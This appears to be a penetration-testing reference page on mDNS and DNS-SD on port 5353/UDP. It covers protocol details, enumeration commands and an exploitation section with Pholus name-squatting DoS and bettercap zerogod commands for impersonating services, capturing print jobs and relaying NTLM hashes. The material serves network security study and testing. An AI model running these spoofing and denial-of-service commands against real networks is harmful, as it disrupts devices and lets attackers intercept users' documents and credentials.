Multicast DNS (mDNS) and DNS-SD - PORT 5353/UDP

Basic Information

Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server.

• Port: 5353/UDP

• Multicast addresses:

  • 224.0.0.251 (IPv4)

  • FF02::FB (IPv6)

It’s most commonly associated with Apple Bonjour, IoT devices, and DNS-SD (DNS Service Discovery).

Key Protocol Details

• Names in the .local zone are resolved via mDNS.

• The QU (Query Unicast) bit may request unicast replies even for multicast questions.

• Implementations should ignore packets not sourced from the local link, but some stacks accept them (attack surface).

• Probing/announcing enforces unique host/service names → interfering can create DoS / name squatting conditions.

DNS-SD Service Model

Services are identified as _._tcp or _._udp under .local. Examples:

• _ipp._tcp.local → printers

• _airplay._tcp.local → AirPlay

• _adb._tcp.local → Android Debug Bridge

You can discover service types with _services._dns-sd._udp.local, then resolve discovered instances to SRV/TXT/A/AAAA.

Nmap scan result example:

PORT     STATE SERVICE
5353/udp open  zeroconf

Enumeration

Nmap

nmap -sU -p 5353 --script=dns-service-discovery <target>

Broadcast discovery (on host):

sudo nmap --script=broadcast-dns-service-discovery 

Avahi (Linux)

# List service types
avahi-browse -bt _services._dns-sd._udp

# Browse all services and resolve to host/port
avahi-browse -art

Apple dns-sd (macOS)

# Browse all HTTP services
dns-sd -B _http._tcp

# Enumerate service types
dns-sd -B _services._dns-sd._udp

# Resolve a specific instance
dns-sd -L "My Printer" _ipp._tcp local

Packet Capture with Tshark

# Live capture
sudo tshark -i eth0 -f "udp port 5353" -Y mdns

# Only DNS-SD service list queries
sudo tshark -i eth0 -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Tip: Browsers/WebRTC often use ephemeral mDNS hostnames (random-UUID.local) to mask local IPs. If you see these, resolve them to pivot to real IPs.

Exploitations

DoS / Name Squatting

During the probing phase, a host checks for name uniqueness. Spoofing conflicts forces it to pick new names or fail.

Example with Pholus:

# Block new devices from taking names
sudo python3 pholus3.py eth0 -afre -stimeout 1000

Service Spoofing & Impersonation (MitM)

Impersonate advertised services (printers, AirPlay, HTTP) to coerce clients into connecting to you.

• Capture print jobs by spoofing _ipp._tcp.local

• Lure users to rogue HTTP services

• Relay NTLM hashes when Windows authenticates to spoofed services

With bettercap’s zerogod module:

# Discover services
sudo bettercap -iface eth0 -eval "zerogod.discovery on"

# Impersonate all services of a host
zerogod.impersonate 192.168.1.42

# Save intercepted print jobs
set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
zerogod.impersonate 192.168.1.42

Recent Vulnerabilities

• Avahi (Linux mDNS daemon)

  • Reachable-assertion and D-Bus crash bugs (2023) → CVE-2023-38469..38473

  • Can crash avahi-daemon, disrupting discovery

• Cisco IOS XE Wireless LAN Controller

  • mDNS gateway DoS (2024, CVE-2024-20303)

  • Adjacent attacker can trigger high CPU & disconnect APs